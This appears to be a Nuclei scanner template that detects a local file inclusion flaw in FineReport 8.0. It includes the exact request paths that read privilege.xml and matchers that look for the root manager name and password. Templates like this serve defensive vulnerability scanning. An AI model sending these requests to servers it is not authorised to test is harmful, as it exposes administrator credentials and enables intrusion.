id: finereport-path-traversal

info:
  name: FineReport 8.0 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: FIneReport  8.0 is vulnerable to local file inclusion.
  reference:
    - http://foreversong.cn/archives/1378
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: finereport,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
      - "{{BaseURL}}/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<rootManagerName>"
          - "<rootManagerPassword>"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/27
